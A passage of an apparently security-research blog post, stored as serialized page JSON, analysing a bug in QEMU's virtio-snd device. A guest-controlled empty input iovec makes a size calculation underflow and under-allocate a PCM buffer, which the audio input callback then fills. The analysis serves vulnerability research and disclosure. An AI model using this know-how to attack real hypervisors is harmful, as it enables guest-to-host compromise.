WITH_QEMU_LOCK_GUARD",{"type":27,"tag":207,"props":131258,"children":131259},{"style":238},[131260],{"type":33,"value":1343},{"type":27,"tag":207,"props":131262,"children":131263},{"style":226},[131264],{"type":33,"value":10398},{"type":27,"tag":207,"props":131266,"children":131267},{"style":220},[131268],{"type":33,"value":43511},{"type":27,"tag":207,"props":131270,"children":131271},{"style":238},[131272],{"type":33,"value":8968},{"type":27,"tag":207,"props":131274,"children":131275},{"style":220},[131276],{"type":33,"value":131277},"queue_mutex",{"type":27,"tag":207,"props":131279,"children":131280},{"style":238},[131281],{"type":33,"value":1424},{"type":27,"tag":207,"props":131283,"children":131284},{"class":209,"line":7917},[131285,131290,131294,131299,131303,131307,131311,131316,131320,131324,131328,131333,131337],{"type":27,"tag":207,"props":131286,"children":131287},{"style":238},[131288],{"type":33,"value":131289}," size ",{"type":27,"tag":207,"props":131291,"children":131292},{"style":226},[131293],{"type":33,"value":10380},{"type":27,"tag":207,"props":131295,"children":131296},{"style":1335},[131297],{"type":33,"value":131298}," iov_size",{"type":27,"tag":207,"props":131300,"children":131301},{"style":238},[131302],{"type":33,"value":1343},{"type":27,"tag":207,"props":131304,"children":131305},{"style":220},[131306],{"type":33,"value":59300},{"type":27,"tag":207,"props":131308,"children":131309},{"style":238},[131310],{"type":33,"value":8968},{"type":27,"tag":207,"props":131312,"children":131313},{"style":220},[131314],{"type":33,"value":131315},"in_sg",{"type":27,"tag":207,"props":131317,"children":131318},{"style":238},[131319],{"type":33,"value":1123},{"type":27,"tag":207,"props":131321,"children":131322},{"style":220},[131323],{"type":33,"value":59300},{"type":27,"tag":207,"props":131325,"children":131326},{"style":238},[131327],{"type":33,"value":8968},{"type":27,"tag":207,"props":131329,"children":131330},{"style":220},[131331],{"type":33,"value":131332},"in_num",{"type":27,"tag":207,"props":131334,"children":131335},{"style":238},[131336],{"type":33,"value":2222},{"type":27,"tag":207,"props":131338,"children":131339},{"style":226},[131340],{"type":33,"value":58100},{"type":27,"tag":207,"props":131342,"children":131343},{"class":209,"line":7926},[131344,131349,131354],{"type":27,"tag":207,"props":131345,"children":131346},{"style":214},[131347],{"type":33,"value":131348}," sizeof",{"type":27,"tag":207,"props":131350,"children":131351},{"style":238},[131352],{"type":33,"value":131353},"(virtio_snd_pcm_status);",{"type":27,"tag":207,"props":131355,"children":131356},{"style":4647},[131357],{"type":33,"value":131358}," // [2]\n",{"type":27,"tag":207,"props":131360,"children":131361},{"class":209,"line":7934},[131362,131367,131371,131376,131380,131384,131389,131393],{"type":27,"tag":207,"props":131363,"children":131364},{"style":238},[131365],{"type":33,"value":131366}," buffer ",{"type":27,"tag":207,"props":131368,"children":131369},{"style":226},[131370],{"type":33,"value":10380},{"type":27,"tag":207,"props":131372,"children":131373},{"style":1335},[131374],{"type":33,"value":131375}," g_malloc0",{"type":27,"tag":207,"props":131377,"children":131378},{"style":238},[131379],{"type":33,"value":1343},{"type":27,"tag":207,"props":131381,"children":131382},{"style":214},[131383],{"type":33,"value":62563},{"type":27,"tag":207,"props":131385,"children":131386},{"style":238},[131387],{"type":33,"value":131388},"(VirtIOSoundPCMBuffer) ",{"type":27,"tag":207,"props":131390,"children":131391},{"style":226},[131392],{"type":33,"value":2227},{"type":27,"tag":207,"props":131394,"children":131395},{"style":238},[131396],{"type":33,"value":131397}," size);\n",{"type":27,"tag":207,"props":131399,"children":131400},{"class":209,"line":7943},[131401,131406,131410,131414,131418],{"type":27,"tag":207,"props":131402,"children":131403},{"style":220},[131404],{"type":33,"value":131405}," buffer",{"type":27,"tag":207,"props":131407,"children":131408},{"style":238},[131409],{"type":33,"value":8968},{"type":27,"tag":207,"props":131411,"children":131412},{"style":220},[131413],{"type":33,"value":59300},{"type":27,"tag":207,"props":131415,"children":131416},{"style":226},[131417],{"type":33,"value":229},{"type":27,"tag":207,"props":131419,"children":131420},{"style":238},[131421],{"type":33,"value":131422}," elem;\n",{"type":27,"tag":207,"props":131424,"children":131425},{"class":209,"line":7952},[131426,131430,131434,131438,131442],{"type":27,"tag":207,"props":131427,"children":131428},{"style":220},[131429],{"type":33,"value":131405},{"type":27,"tag":207,"props":131431,"children":131432},{"style":238},[131433],{"type":33,"value":8968},{"type":27,"tag":207,"props":131435,"children":131436},{"style":220},[131437],{"type":33,"value":131074},{"type":27,"tag":207,"props":131439,"children":131440},{"style":226},[131441],{"type":33,"value":229},{"type":27,"tag":207,"props":131443,"children":131444},{"style":238},[131445],{"type":33,"value":131446}," vq;\n",{"type":27,"tag":207,"props":131448,"children":131449},{"class":209,"line":7961},[131450,131454,131458,131463,131467,131471],{"type":27,"tag":207,"props":131451,"children":131452},{"style":220},[131453],{"type":33,"value":131405},{"type":27,"tag":207,"props":131455,"children":131456},{"style":238},[131457],{"type":33,"value":8968},{"type":27,"tag":207,"props":131459,"children":131460},{"style":220},[131461],{"type":33,"value":131462},"size",{"type":27,"tag":207,"props":131464,"children":131465},{"style":226},[131466],{"type":33,"value":229},{"type":27,"tag":207,"props":131468,"children":131469},{"style":232},[131470],{"type":33,"value":4680},{"type":27,"tag":207,"props":131472,"children":131473},{"style":238},[131474],{"type":33,"value":241},{"type":27,"tag":207,"props":131476,"children":131477},{"class":209,"line":7969},[131478,131482,131486,131490,131494,131498],{"type":27,"tag":207,"props":131479,"children":131480},{"style":220},[131481],{"type":33,"value":131405},{"type":27,"tag":207,"props":131483,"children":131484},{"style":238},[131485],{"type":33,"value":8968},{"type":27,"tag":207,"props":131487,"children":131488},{"style":220},[131489],{"type":33,"value":21177},{"type":27,"tag":207,"props":131491,"children":131492},{"style":226},[131493],{"type":33,"value":229},{"type":27,"tag":207,"props":131495,"children":131496},{"style":232},[131497],{"type":33,"value":4680},{"type":27,"tag":207,"props":131499,"children":131500},{"style":238},[131501],{"type":33,"value":241},{"type":27,"tag":207,"props":131503,"children":131504},{"class":209,"line":7978},[131505,131510,131514,131518,131522,131526,131531,131536],{"type":27,"tag":207,"props":131506,"children":131507},{"style":1335},[131508],{"type":33,"value":131509}," QSIMPLEQ_INSERT_TAIL",{"type":27,"tag":207,"props":131511,"children":131512},{"style":238},[131513],{"type":33,"value":1343},{"type":27,"tag":207,"props":131515,"children":131516},{"style":226},[131517],{"type":33,"value":10398},{"type":27,"tag":207,"props":131519,"children":131520},{"style":220},[131521],{"type":33,"value":43511},{"type":27,"tag":207,"props":131523,"children":131524},{"style":238},[131525],{"type":33,"value":8968},{"type":27,"tag":207,"props":131527,"children":131528},{"style":220},[131529],{"type":33,"value":131530},"queue",{"type":27,"tag":207,"props":131532,"children":131533},{"style":238},[131534],{"type":33,"value":131535},", buffer, entry);",{"type":27,"tag":207,"props":131537,"children":131538},{"style":4647},[131539],{"type":33,"value":59865},{"type":27,"tag":207,"props":131541,"children":131542},{"class":209,"line":7987},[131543],{"type":27,"tag":207,"props":131544,"children":131545},{"style":238},[131546],{"type":33,"value":10637},{"type":27,"tag":207,"props":131548,"children":131549},{"class":209,"line":7996},[131550,131555],{"type":27,"tag":207,"props":131551,"children":131552},{"style":376},[131553],{"type":33,"value":131554}," continue",{"type":27,"tag":207,"props":131556,"children":131557},{"style":238},[131558],{"type":33,"value":241},{"type":27,"tag":207,"props":131560,"children":131561},{"class":209,"line":8005},[131562],{"type":27,"tag":207,"props":131563,"children":131564},{"emptyLinePlaceholder":19},[131565],{"type":33,"value":2062},{"type":27,"tag":207,"props":131567,"children":131568},{"class":209,"line":8013},[131569],{"type":27,"tag":207,"props":131570,"children":131571},{"style":238},[131572],{"type":33,"value":131241},{"type":27,"tag":207,"props":131574,"children":131575},{"class":209,"line":8021},[131576],{"type":27,"tag":207,"props":131577,"children":131578},{"style":238},[131579],{"type":33,"value":451},{"type":27,"tag":36,"props":131581,"children":131582},{},[131583,131585,131591,131593,131599,131601,131606,131607,131613],{"type":33,"value":131584},"At ",{"type":27,"tag":84,"props":131586,"children":131588},{"className":131587},[],[131589],{"type":33,"value":131590},"[1]",{"type":33,"value":131592},", a ",{"type":27,"tag":84,"props":131594,"children":131596},{"className":131595},[],[131597],{"type":33,"value":131598},"VirtQueueElement *elem",{"type":33,"value":131600}," is popped from the virtqueue. It contains the ",{"type":27,"tag":84,"props":131602,"children":131604},{"className":131603},[],[131605],{"type":33,"value":131315},{"type":33,"value":1131},{"type":27,"tag":84,"props":131608,"children":131610},{"className":131609},[],[131611],{"type":33,"value":131612},"out_sg",{"type":33,"value":131614}," iovecs that describe the guest request, and is therefore fully guest-controlled.",{"type":27,"tag":36,"props":131616,"children":131617},{},[131618,131620,131626,131628,131634,131636,131642,131644,131650,131652,131658],{"type":33,"value":131619},"Further at ",{"type":27,"tag":84,"props":131621,"children":131623},{"className":131622},[],[131624],{"type":33,"value":131625},"[2]",{"type":33,"value":131627},", the device computes the size of the data buffer as ",{"type":27,"tag":84,"props":131629,"children":131631},{"className":131630},[],[131632],{"type":33,"value":131633},"iov_size(elem->in_sg, elem->in_num) - sizeof(virtio_snd_pcm_status)",{"type":33,"value":131635},". That value is then used in the allocation: ",{"type":27,"tag":84,"props":131637,"children":131639},{"className":131638},[],[131640],{"type":33,"value":131641},"g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size)",{"type":33,"value":131643},". Finally, at ",{"type":27,"tag":84,"props":131645,"children":131647},{"className":131646},[],[131648],{"type":33,"value":131649},"[3]",{"type":33,"value":131651},", the newly allocated buffer is appended to the ",{"type":27,"tag":84,"props":131653,"children":131655},{"className":131654},[],[131656],{"type":33,"value":131657},"stream->queue",{"type":33,"value":131659}," linked list.",{"type":27,"tag":36,"props":131661,"children":131662},{},[131663,131665,131670,131672,131677,131679,131684,131686,131692],{"type":33,"value":131664},"Because both the ",{"type":27,"tag":84,"props":131666,"children":131668},{"className":131667},[],[131669],{"type":33,"value":131315},{"type":33,"value":131671}," iovec and the ",{"type":27,"tag":84,"props":131673,"children":131675},{"className":131674},[],[131676],{"type":33,"value":131332},{"type":33,"value":131678}," field are guest-controlled, and there is no check that the total ",{"type":27,"tag":84,"props":131680,"children":131682},{"className":131681},[],[131683],{"type":33,"value":131315},{"type":33,"value":131685}," size is at least ",{"type":27,"tag":84,"props":131687,"children":131689},{"className":131688},[],[131690],{"type":33,"value":131691},"sizeof(virtio_snd_pcm_status)",{"type":33,"value":131693},", this calculation can underflow if the guest provides a smaller input buffer - that gives us our first bug.",{"type":27,"tag":36,"props":131695,"children":131696},{},[131697,131699,131704,131706,131712,131714,131720,131722,131728],{"type":33,"value":131698},"From the guest driver, we can provide an empty ",{"type":27,"tag":84,"props":131700,"children":131702},{"className":131701},[],[131703],{"type":33,"value":131315},{"type":33,"value":131705}," iovec. In that case, the calculation becomes ",{"type":27,"tag":84,"props":131707,"children":131709},{"className":131708},[],[131710],{"type":33,"value":131711},"0 - sizeof(virtio_snd_pcm_status)",{"type":33,"value":131713},", so the allocation size effectively becomes ",{"type":27,"tag":84,"props":131715,"children":131717},{"className":131716},[],[131718],{"type":33,"value":131719},"sizeof(VirtIOSoundPCMBuffer) - 8",{"type":33,"value":131721},". Given the definition of ",{"type":27,"tag":84,"props":131723,"children":131725},{"className":131724},[],[131726],{"type":33,"value":131727},"VirtIOSoundPCMBuffer",{"type":33,"value":736},{"type":27,"tag":101,"props":131730,"children":131732},{"code":131731,"language":10435,"meta":7,"className":23789,"style":7},"struct VirtIOSoundPCMBuffer {\n QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;\n VirtQueueElement *elem;\n VirtQueue *vq;\n size_t size;\n uint64_t offset;\n /* Used for the TX queue for lazy I/O copy from `elem` */\n bool populated;\n uint8_t data[];\n};\n",[131733],{"type":27,"tag":84,"props":131734,"children":131735},{"__ignoreMap":7},[131736,131748,131761,131776,131793,131805,131817,131825,131837,131857],{"type":27,"tag":207,"props":131737,"children":131738},{"class":209,"line":210},[131739,131743],{"type":27,"tag":207,"props":131740,"children":131741},{"style":214},[131742],{"type":33,"value":16677},{"type":27,"tag":207,"props":131744,"children":131745},{"style":238},[131746],{"type":33,"value":131747}," VirtIOSoundPCMBuffer {\n",{"type":27,"tag":207,"props":131749,"children":131750},{"class":209,"line":244},[131751,131756],{"type":27,"tag":207,"props":131752,"children":131753},{"style":1335},[131754],{"type":33,"value":131755}," QSIMPLEQ_ENTRY",{"type":27,"tag":207,"props":131757,"children":131758},{"style":238},[131759],{"type":33,"value":131760},"(VirtIOSoundPCMBuffer) entry;\n",{"type":27,"tag":207,"props":131762,"children":131763},{"class":209,"line":270},[131764,131768,131772],{"type":27,"tag":207,"props":131765,"children":131766},{"style":238},[131767],{"type":33,"value":131093},{"type":27,"tag":207,"props":131769,"children":131770},{"style":226},[131771],{"type":33,"value":9286},{"type":27,"tag":207,"props":131773,"children":131774},{"style":238},[131775],{"type":33,"value":131102},{"type":27,"tag":207,"props":131777,"children":131778},{"class":209,"line":296},[131779,131784,131788],{"type":27,"tag":207,"props":131780,"children":131781},{"style":238},[131782],{"type":33,"value":131783}," VirtQueue ",{"type":27,"tag":207,"props":131785,"children":131786},{"style":226},[131787],{"type":33,"value":9286},{"type":27,"tag":207,"props":131789,"children":131790},{"style":238},[131791],{"type":33,"value":131792},"vq;\n",{"type":27,"tag":207,"props":131794,"children":131795},{"class":209,"line":445},[131796,131800],{"type":27,"tag":207,"props":131797,"children":131798},{"style":214},[131799],{"type":33,"value":23839},{"type":27,"tag":207,"props":131801,"children":131802},{"style":238},[131803],{"type":33,"value":131804}," size;\n",{"type":27,"tag":207,"props":131806,"children":131807},{"class":209,"line":867},[131808,131812],{"type":27,"tag":207,"props":131809,"children":131810},{"style":214},[131811],{"type":33,"value":62848},{"type":27,"tag":207,"props":131813,"children":131814},{"style":238},[131815],{"type":33,"value":131816}," offset;\n",{"type":27,"tag":207,"props":131818,"children":131819},{"class":209,"line":892},[131820],{"type":27,"tag":207,"props":131821,"children":131822},{"style":4647},[131823],{"type":33,"value":131824}," /* Used for the TX queue for lazy I/O copy from `elem` */\n",{"type":27,"tag":207,"props":131826,"children":131827},{"class":209,"line":1475},[131828,131832],{"type":27,"tag":207,"props":131829,"children":131830},{"style":214},[131831],{"type":33,"value":53715},{"type":27,"tag":207,"props":131833,"children":131834},{"style":238},[131835],{"type":33,"value":131836}," populated;\n",{"type":27,"tag":207,"props":131838,"children":131839},{"class":209,"line":2065},[131840,131844,131848,131853],{"type":27,"tag":207,"props":131841,"children":131842},{"style":214},[131843],{"type":33,"value":65690},{"type":27,"tag":207,"props":131845,"children":131846},{"style":238},[131847],{"type":33,"value":22379},{"type":27,"tag":207,"props":131849,"children":131850},{"style":214},[131851],{"type":33,"value":131852},"[]",{"type":27,"tag":207,"props":131854,"children":131855},{"style":238},[131856],{"type":33,"value":241},{"type":27,"tag":207,"props":131858,"children":131859},{"class":209,"line":2092},[131860],{"type":27,"tag":207,"props":131861,"children":131862},{"style":238},[131863],{"type":33,"value":23852},{"type":27,"tag":36,"props":131865,"children":131866},{},[131867,131869,131875,131877,131882,131884,131889,131891,131896,131898,131903,131905,131911],{"type":33,"value":131868},"That under-allocation removes the ",{"type":27,"tag":84,"props":131870,"children":131872},{"className":131871},[],[131873],{"type":33,"value":131874},"populated",{"type":33,"value":131876}," field along with the variable-sized ",{"type":27,"tag":84,"props":131878,"children":131880},{"className":131879},[],[131881],{"type":33,"value":9468},{"type":33,"value":131883}," array. As the comment says, ",{"type":27,"tag":84,"props":131885,"children":131887},{"className":131886},[],[131888],{"type":33,"value":131874},{"type":33,"value":131890}," is only relevant to the TX path and is not used for audio input. However, by making the iovec size ",{"type":27,"tag":84,"props":131892,"children":131894},{"className":131893},[],[131895],{"type":33,"value":1651},{"type":33,"value":131897},", the device believes data should be ",{"type":27,"tag":84,"props":131899,"children":131901},{"className":131900},[],[131902],{"type":33,"value":1651},{"type":33,"value":131904}," byte, while the actual allocation is ",{"type":27,"tag":84,"props":131906,"children":131908},{"className":131907},[],[131909],{"type":33,"value":131910},"sizeof(VirtIOSoundPCMBuffer) - 7",{"type":33,"value":1041},{"type":27,"tag":26163,"props":131913,"children":131915},{"id":131914},"populating-data-buffers",[131916],{"type":33,"value":131917},"Populating Data Buffers",{"type":27,"tag":36,"props":131919,"children":131920},{},[131921],{"type":33,"value":131922},"Let's take a look at how the allocated data buffer for the input stream is filled:",{"type":27,"tag":101,"props":131924,"children":131926},{"code":131925,"language":10435,"meta":7,"className":23789,"style":7},"/*\n * AUD_* input callback.\n *\n * @data: VirtIOSoundPCMStream stream\n * @available: number of bytes that can be read with AUD_read()\n */\nstatic void virtio_snd_pcm_in_cb(void *data, int available)\n{\n VirtIOSoundPCMStream *stream = data;\n VirtIOSoundPCMBuffer *buffer;\n size_t size, max_size;\n\n WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {\n while (!QSIMPLEQ_EMPTY(&stream->queue)) {\n buffer = QSIMPLEQ_FIRST(&stream->queue);\n\n [...]\n\n max_size = iov_size( // [1]\n buffer->elem->in_sg,\n buffer->elem->in_num\n );\n for (;;) {\n if (buffer->size >= max_size) { // [2]\n return_rx_buffer(stream, buffer);\n break;\n }\n size = AUD_read(stream->voice.in,\n buffer->data + buffer->size,\n MIN(available, (stream->params.period_bytes - // [3]\n buffer->size)));\n if (!size) {\n available = 0;\n break;\n }\n buffer->size += size;\n available -= size;\n [...]\n }\n }\n }\n}\n",[131927],{"type":27,"tag":84,"props":131928,"children":131929},{"__ignoreMap":7},[131930,131937,131945,131952,131960,131968,131975,132024,132031,132057,132074,132086,132093,132125,132170,132210,132217,132225,132232,132257,132285,132309,132317,132329,132366,132379,132391,132398,132444,132480,132523,132544,132564,132584,132595,132602,132625,132641,132649,132656,132663,132670],{"type":27,"tag":207,"props":131931,"children":131932},{"class":209,"line":210},[131933],{"type":27,"tag":207,"props":131934,"children":131935},{"style":4647},[131936],{"type":33,"value":56604},{"type":27,"tag":207,"props":131938,"children":131939},{"class":209,"line":244},[131940],{"type":27,"tag":207,"props":131941,"children":131942},{"style":4647},[131943],{"type":33,"value":131944}," * AUD_* input callback.\n",{"type":27,"tag":207,"props":131946,"children":131947},{"class":209,"line":270},[131948],{"type":27,"tag":207,"props":131949,"children":131950},{"style":4647},[131951],{"type":33,"value":26759},{"type":27,"tag":207,"props":131953,"children":131954},{"class":209,"line":296},[131955],{"type":27,"tag":207,"props":131956,"children":131957},{"style":4647},[131958],{"type":33,"value":131959}," * @data: VirtIOSoundPCMStream stream\n",{"type":27,"tag":207,"props":131961,"children":131962},{"class":209,"line":445},[131963],{"type":27,"tag":207,"props":131964,"children":131965},{"style":4647},[131966],{"type":33,"value":131967}," * @available: number of bytes that can be read with AUD_read()\n",{"type":27,"tag":207,"props":131969,"children":131970},{"class":209,"line":867},[131971],{"type":27,"tag":207,"props":131972,"children":131973},{"style":4647},[131974],{"type":33,"value":131030},{"type":27,"tag":207,"props":131976,"children":131977},{"class":209,"line":892},[131978,131982,131986,131991,131995,131999,132003,132007,132011,132015,132020],{"type":27,"tag":207,"props":131979,"children":131980},{"style":214},[131981],{"type":33,"value":58283},{"type":27,"tag":207,"props":131983,"children":131984},{"style":214},[131985],{"type":33,"value":58288},{"type":27,"tag":207,"props":131987,"children":131988},{"style":1335},[131989],{"type":33,"value":131990}," virtio_snd_pcm_in_cb",{"type":27,"tag":207,"props":131992,"children":131993},{"style":238},[131994],{"type":33,"value":1343},{"type":27,"tag":207,"props":131996,"children":131997},{"style":214},[131998],{"type":33,"value":58863},{"type":27,"tag":207,"props":132000,"children":132001},{"style":226},[132002],{"type":33,"value":17093},{"type":27,"tag":207,"props":132004,"children":132005},{"style":220},[132006],{"type":33,"value":9468},{"type":27,"tag":207,"props":132008,"children":132009},{"style":238},[132010],{"type":33,"value":1123},{"type":27,"tag":207,"props":132012,"children":132013},{"style":214},[132014],{"type":33,"value":26317},{"type":27,"tag":207,"props":132016,"children":132017},{"style":220},[132018],{"type":33,"value":132019}," available",{"type":27,"tag":207,"props":132021,"children":132022},{"style":238},[132023],{"type":33,"value":10449},{"type":27,"tag":207,"props":132025,"children":132026},{"class":209,"line":1475},[132027],{"type":27,"tag":207,"props":132028,"children":132029},{"style":238},[132030],{"type":33,"value":18158},{"type":27,"tag":207,"props":132032,"children":132033},{"class":209,"line":2065},[132034,132039,132043,132048,132052],{"type":27,"tag":207,"props":132035,"children":132036},{"style":238},[132037],{"type":33,"value":132038}," VirtIOSoundPCMStream ",{"type":27,"tag":207,"props":132040,"children":132041},{"style":226},[132042],{"type":33,"value":9286},{"type":27,"tag":207,"props":132044,"children":132045},{"style":238},[132046],{"type":33,"value":132047},"stream ",{"type":27,"tag":207,"props":132049,"children":132050},{"style":226},[132051],{"type":33,"value":10380},{"type":27,"tag":207,"props":132053,"children":132054},{"style":238},[132055],{"type":33,"value":132056}," data;\n",{"type":27,"tag":207,"props":132058,"children":132059},{"class":209,"line":2092},[132060,132065,132069],{"type":27,"tag":207,"props":132061,"children":132062},{"style":238},[132063],{"type":33,"value":132064}," VirtIOSoundPCMBuffer ",{"type":27,"tag":207,"props":132066,"children":132067},{"style":226},[132068],{"type":33,"value":9286},{"type":27,"tag":207,"props":132070,"children":132071},{"style":238},[132072],{"type":33,"value":132073},"buffer;\n",{"type":27,"tag":207,"props":132075,"children":132076},{"class":209,"line":2130},[132077,132081],{"type":27,"tag":207,"props":132078,"children":132079},{"style":214},[132080],{"type":33,"value":23839},{"type":27,"tag":207,"props":132082,"children":132083},{"style":238},[132084],{"type":33,"value":132085}," size, max_size;\n",{"type":27,"tag":207,"props":132087,"children":132088},{"class":209,"line":2168},[132089],{"type":27,"tag":207,"props":132090,"children":132091},{"emptyLinePlaceholder":19},[132092],{"type":33,"value":2062},{"type":27,"tag":207,"props":132094,"children":132095},{"class":209,"line":4095},[132096,132101,132105,132109,132113,132117,132121],{"type":27,"tag":207,"props":132097,"children":132098},{"style":1335},[132099],{"type":33,"value":132100}," WITH_QEMU_LOCK_GUARD",{"type":27,"tag":207,"props":132102,"children":132103},{"style":238},[132104],{"type":33,"value":1343},{"type":27,"tag":207,"props":132106,"children":132107},{"style":226},[132108],{"type":33,"value":10398},{"type":27,"tag":207,"props":132110,"children":132111},{"style":220},[132112],{"type":33,"value":43511},{"type":27,"tag":207,"props":132114,"children":132115},{"style":238},[132116],{"type":33,"value":8968},{"type":27,"tag":207,"props":132118,"children":132119},{"style":220},[132120],{"type":33,"value":131277},{"type":27,"tag":207,"props":132122,"children":132123},{"style":238},[132124],{"type":33,"value":1424},{"type":27,"tag":207,"props":132126,"children":132127},{"class":209,"line":4103},[132128,132133,132137,132141,132146,132150,132154,132158,132162,132166],{"type":27,"tag":207,"props":132129,"children":132130},{"style":376},[132131],{"type":33,"value":132132}," while",{"type":27,"tag":207,"props":132134,"children":132135},{"style":238},[132136],{"type":33,"value":686},{"type":27,"tag":207,"props":132138,"children":132139},{"style":226},[132140],{"type":33,"value":27893},{"type":27,"tag":207,"props":132142,"children":132143},{"style":1335},[132144],{"type":33,"value":132145},"QSIMPLEQ_EMPTY",{"type":27,"tag":207,"props":132147,"children":132148},{"style":238},[132149],{"type":33,"value":1343},{"type":27,"tag":207,"props":132151,"children":132152},{"style":226},[132153],{"type":33,"value":10398},{"type":27,"tag":207,"props":132155,"children":132156},{"style":220},[132157],{"type":33,"value":43511},{"type":27,"tag":207,"props":132159,"children":132160},{"style":238},[132161],{"type":33,"value":8968},{"type":27,"tag":207,"props":132163,"children":132164},{"style":220},[132165],{"type":33,"value":131530},{"type":27,"tag":207,"props":132167,"children":132168},{"style":238},[132169],{"type":33,"value":8955},{"type":27,"tag":207,"props":132171,"children":132172},{"class":209,"line":4154},[132173,132177,132181,132186,132190,132194,132198,132202,132206],{"type":27,"tag":207,"props":132174,"children":132175},{"style":238},[132176],{"type":33,"value":131366},{"type":27,"tag":207,"props":132178,"children":132179},{"style":226},[132180],{"type":33,"value":10380},{"type":27,"tag":207,"props":132182,"children":132183},{"style":1335},[132184],{"type":33,"value":132185}," QSIMPLEQ_FIRST",{"type":27,"tag":207,"props":132187,"children":132188},{"style":238},[132189],{"type":33,"value":1343},{"type":27,"tag":207,"props":132191,"children":132192},{"style":226},[132193],{"type":33,"value":10398},{"type":27,"tag":207,"props":132195,"children":132196},{"style":220},[132197],{"type":33,"value":43511},{"type":27,"tag":207,"props":132199,"children":132200},{"style":238},[132201],{"type":33,"value":8968},{"type":27,"tag":207,"props":132203,"children":132204},{"style":220},[132205],{"type":33,"value":131530},{"type":27,"tag":207,"props":132207,"children":132208},{"style":238},[132209],{"type":33,"value":1455},{"type":27,"tag":207,"props":132211,"children":132212},{"class":209,"line":4203},[132213],{"type":27,"tag":207,"props":132214,"children":132215},{"emptyLinePlaceholder":19},[132216],{"type":33,"value":2062},{"type":27,"tag":207,"props":132218,"children":132219},{"class":209,"line":4249},[132220],{"type":27,"tag":207,"props":132221,"children":132222},{"style":238},[132223],{"type":33,"value":132224}," [...]\n",{"type":27,"tag":207,"props":132226,"children":132227},{"class":209,"line":4290},[132228],{"type":27,"tag":207,"props":132229,"children":132230},{"emptyLinePlaceholder":19},[132231],{"type":33,"value":2062},{"type":27,"tag":207,"props":132233,"children":132234},{"class":209,"line":4304},[132235,132240,132244,132248,132252],{"type":27,"tag":207,"props":132236,"children":132237},{"style":238},[132238],{"type":33,"value":132239}," max_size ",{"type":27,"tag":207,"props":132241,"children":132242},{"style":226},[132243],{"type":33,"value":10380},{"type":27,"tag":207,"props":132245,"children":132246},{"style":1335},[132247],{"type":33,"value":131298},{"type":27,"tag":207,"props":132249,"children":132250},{"style":238},[132251],{"type":33,"value":1343},{"type":27,"tag":207,"props":132253,"children":132254},{"style":4647},[132255],{"type":33,"value":132256}," // [1]\n",{"type":27,"tag":207,"props":132258,"children":132259},{"class":209,"line":5466},[132260,132265,132269,132273,132277,132281],{"type":27,"tag":207,"props":132261,"children":132262},{"style":220},[132263],{"type":33,"value":132264}," buffer",{"type":27,"tag":207,"props":132266,"children":132267},{"style":238},[132268],{"type":33,"value":8968},{"type":27,"tag":207,"props":132270,"children":132271},{"style":220},[132272],{"type":33,"value":59300},{"type":27,"tag":207,"props":132274,"children":132275},{"style":238},[132276],{"type":33,"value":8968},{"type":27,"tag":207,"props":132278,"children":132279},{"style":220},[132280],{"type":33,"value":131315},{"type":27,"tag":207,"props":132282,"children":132283},{"style":238},[132284],{"type":33,"value":1842},{"type":27,"tag":207,"props":132286,"children":132287},{"class":209,"line":5530},[132288,132292,132296,132300,132304],{"type":27,"tag":207,"props":132289,"children":132290},{"style":220},[132291],{"type":33,"value":132264},{"type":27,"tag":207,"props":132293,"children":132294},{"style":238},[132295],{"type":33,"value":8968},{"type":27,"tag":207,"props":132297,"children":132298},{"style":220},[132299],{"type":33,"value":59300},{"type":27,"tag":207,"props":132301,"children":132302},{"style":238},[132303],{"type":33,"value":8968},{"type":27,"tag":207,"props":132305,"children":132306},{"style":220},[132307],{"type":33,"value":132308},"in_num\n",{"type":27,"tag":207,"props":132310,"children":132311},{"class":209,"line":7900},[132312],{"type":27,"tag":207,"props":132313,"children":132314},{"style":238},[132315],{"type":33,"value":132316}," );\n",{"type":27,"tag":207,"props":132318,"children":132319},{"class":209,"line":7909},[132320,132325],{"type":27,"tag":207,"props":132321,"children":132322},{"style":376},[132323],{"type":33,"value":132324}," for",{"type":27,"tag":207,"props":132326,"children":132327},{"style":238},[132328],{"type":33,"value":131128},{"type":27,"tag":207,"props":132330,"children":132331},{"class":209,"line":7917},[132332,132336,132340,132344,132348,132352,132356,132361],{"type":27,"tag":207,"props":132333,"children":132334},{"style":376},[132335],{"type":33,"value":110727},{"type":27,"tag":207,"props":132337,"children":132338},{"style":238},[132339],{"type":33,"value":686},{"type":27,"tag":207,"props":132341,"children":132342},{"style":220},[132343],{"type":33,"value":4139},{"type":27,"tag":207,"props":132345,"children":132346},{"style":238},[132347],{"type":33,"value":8968},{"type":27,"tag":207,"props":132349,"children":132350},{"style":220},[132351],{"type":33,"value":131462},{"type":27,"tag":207,"props":132353,"children":132354},{"style":226},[132355],{"type":33,"value":15583},{"type":27,"tag":207,"props":132357,"children":132358},{"style":238},[132359],{"type":33,"value":132360}," max_size) {",{"type":27,"tag":207,"props":132362,"children":132363},{"style":4647},[132364],{"type":33,"value":132365}," // [2]\n",{"type":27,"tag":207,"props":132367,"children":132368},{"class":209,"line":7926},[132369,132374],{"type":27,"tag":207,"props":132370,"children":132371},{"style":1335},[132372],{"type":33,"value":132373}," return_rx_buffer",{"type":27,"tag":207,"props":132375,"children":132376},{"style":238},[132377],{"type":33,"value":132378},"(stream, buffer);\n",{"type":27,"tag":207,"props":132380,"children":132381},{"class":209,"line":7934},[132382,132387],{"type":27,"tag":207,"props":132383,"children":132384},{"style":376},[132385],{"type":33,"value":132386}," break",{"type":27,"tag":207,"props":132388,"children":132389},{"style":238},[132390],{"type":33,"value":241},{"type":27,"tag":207,"props":132392,"children":132393},{"class":209,"line":7943},[132394],{"type":27,"tag":207,"props":132395,"children":132396},{"style":238},[132397],{"type":33,"value":78304},{"type":27,"tag":207,"props":132399,"children":132400},{"class":209,"line":7952},[132401,132406,132410,132415,132419,132423,132427,132432,132436,132440],{"type":27,"tag":207,"props":132402,"children":132403},{"style":238},[132404],{"type":33,"value":132405}," size ",{"type":27,"tag":207,"props":132407,"children":132408},{"style":226},[132409],{"type":33,"value":10380},{"type":27,"tag":207,"props":132411,"children":132412},{"style":1335},[132413],{"type":33,"value":132414}," 